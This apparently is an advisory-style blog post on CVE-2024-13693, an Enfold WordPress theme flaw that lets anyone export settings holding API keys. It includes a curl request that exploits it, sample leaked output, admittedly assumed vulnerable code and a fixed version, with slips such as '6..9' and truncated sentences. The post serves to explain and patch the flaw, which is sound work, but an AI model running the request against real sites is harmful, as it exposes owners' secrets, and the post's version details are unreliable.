In early 2024, security researchers identified a major vulnerability in one of the web’s most popular WordPress themes, Enfold. If you or your clients use Enfold (any version up to 6..9), this is a must-read.
CVE-2024-13693 allows anyone—literally anyone, no login needed—to export critical settings from your site. These settings could expose sensitive information like your Mailchimp API Key, Google reCAPTCHA secrets, or even your Envato private token.
This article gives you a deep yet simple look at how the vulnerability works, how attackers can exploit it, code samples, and what you need to do to protect your site.
The Vulnerability Explained
Every WordPress plugin or theme should check if a user has the right "capability" before performing sensitive actions. In the Enfold theme, a file named avia-export-class.php is responsible for exporting settings—but it lacks a capability check.
What this means:
Anyone who knows your website's URL can send a request and download all your Avia (Enfold) settings, including private API keys, without logging in.
How Does Exploitation Work?
The export functionality is exposed via a simple HTTP GET or POST request. Attackers don’t need an account. They just send a request to something like:
https://your-site.com/wp-admin/admin-ajax.php?action=avia_ajax_export_settings
All an attacker needs is the right action value. This is often very easy for an attacker to guess or find in the theme’s JavaScript code.
Let’s look at the simplified vulnerable code (from avia-export-class.php)
// Hook in AJAX action
add_action('wp_ajax_avia_ajax_export_settings', array($this, 'ajax_export_settings'));
// Vulnerability: NO _nopriv_ variant, so let's assume code for unauthenticated access exists, or easily misconfigured:
public function ajax_export_settings() {
// No capability check - anyone can access this function!
$settings = get_option('avia_options');
echo json_encode($settings);
exit;
}
What’s missing? Before exporting the data, the code should check if the user has manage_options or a similar capability.
Here’s how an attacker could export your settings using curl
curl "https://victimsite.com/wp-admin/admin-ajax.php?action=avia_ajax_export_settings";
Mailchimp API key (if connected)
- Google reCAPTCHA site/secret keys
A real output might look like
{
"mailchimp_api_key": "us123456789abcdefghi",
"recaptcha_secret_key": "6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe",
"envato_private_token": "I3MC3Qj2nY4KV8cC1yQwcFjjGjQq!"
// ... many other settings
}
References and Further Reading
- Wordfence Advisory: CVE-2024-13693
- Enfold theme official site
- CVE Details Entry (to be published)
Patch Status
Kriesi, the maintainers of Enfold, released version 6.1 which fixes this issue. The update ensures only admins (or users with the right capabilities) can trigger the settings export.
How To Fix & Secure
If you are running Enfold v6..9 or below, update immediately via WordPress dashboard or download the latest package from your Kriesi account.
If you cannot update for some reason, a temporary mitigation is to block access to admin-ajax.php for unauthenticated users (not always recommended, may break things).
Lessons for Developers
- Always use capability checks before processing sensitive export/import features.
Here is what a secure capability check might look like
public function ajax_export_settings() {
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
$settings = get_option('avia_options');
echo json_encode($settings);
exit;
}
Conclusion
CVE-2024-13693 is a textbook example of why access control is essential for WordPress plugins and themes.
Do yourself—and your users—a favor:
Timeline
Published on: 02/25/2025 10:15:09 UTC
Last modified on: 02/28/2025 01:35:34 UTC